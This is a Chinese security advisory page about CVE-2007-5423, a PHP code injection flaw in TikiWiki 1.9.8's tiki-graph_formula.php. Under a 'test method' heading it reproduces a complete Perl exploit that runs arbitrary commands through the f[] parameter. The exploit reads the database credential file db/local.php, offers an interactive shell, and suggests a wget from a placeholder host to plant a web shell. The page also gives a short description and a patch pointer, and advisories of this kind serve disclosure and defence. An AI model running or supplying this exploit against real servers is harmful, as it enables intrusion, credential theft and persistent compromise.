安全研究
安全漏洞
TikiWiki Tiki-Graph_Formula.PHP代码注入漏洞
发布日期:2007-10-10
更新日期:2007-10-24
受影响系统:
TikiWiki Project TikiWiki 1.9.8描述:
BUGTRAQ ID: 26006
CVE ID: CVE-2007-5423
TikiWiki是基于PHP、ADOdb以及smarty开发的CMS(内容管理系统)/门户系统/群件(Groupware)系统。更重要的是TikiWiki是一个基于LGPL协议的开源工程,由来自全世界范围的的开源爱好者、捐赠者参与开发维护的。
TikiWiki 1.9.8中的tiki-graph_formula.php在实现存在安全漏洞,远程攻击者可通过f array参数中的PHP序列利用此漏洞执行任意代码。
<*来源:ShAnKaR
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# TikiWiki <= 1.9.8 Remote Command Execution Exploit
#
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute
arbitrary commands.
# The issue is due to 'tiki-graph_formula.php' script not properly
sanitizing user input
# supplied to the f variable, which may allow a remote attacker to
execute arbitrary PHP
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR <sec [at] shankar.antichat.ru>
#
# $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $
use strict;
use LWP::UserAgent;
my $target = shift || &usage();
my $proxy = shift;
my $command;
&exploit($target, "cat db/local.php", $proxy);
print "[?] php shell it?\n";
print "[*] wget http://www.youhost.com/yourshell.txt -O
backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";
while()
{
print "tiki\# ";
chomp($command = <STDIN>);
exit unless $command;
&exploit($target, $command, $proxy);
}
sub usage()
{
print "[?] TikiWiki <= 1.9.8 Remote Command Execution
Exploit\n";
print "[?] str0ke <str0ke[!]milw0rm.com>\n";
print "[?] usage: perl $0 [target]\n";
print " [target] (ex. http://127.0.0.1/tikiwiki)\n";
print " [proxy] (ex. 0.0.0.0:8080)\n";
exit;
}
sub exploit()
{
my($target, $command, $proxy) = @_;
my $cmd = 'echo start_er;'.$command.';'.'echo end_er';
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*',
$cmd));
my $conn = LWP::UserAgent->new() or die;
$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0;
Windows-NT)");
$conn->proxy("http", "http://".$proxy."/") unless !$proxy;
my
$out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");
if ($out->content =~ m/start_er(.*?)end_er/ms) {
print $1 . "\n";
} else {
print "[-] Exploit Failed\n";
exit;
}
}
建议:
厂商补丁:
TikiWiki Project
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://tikiwiki.org/tiki-index.ph
浏览次数:2673
严重程度:0(网友投票)
绿盟科技给您安全的保障
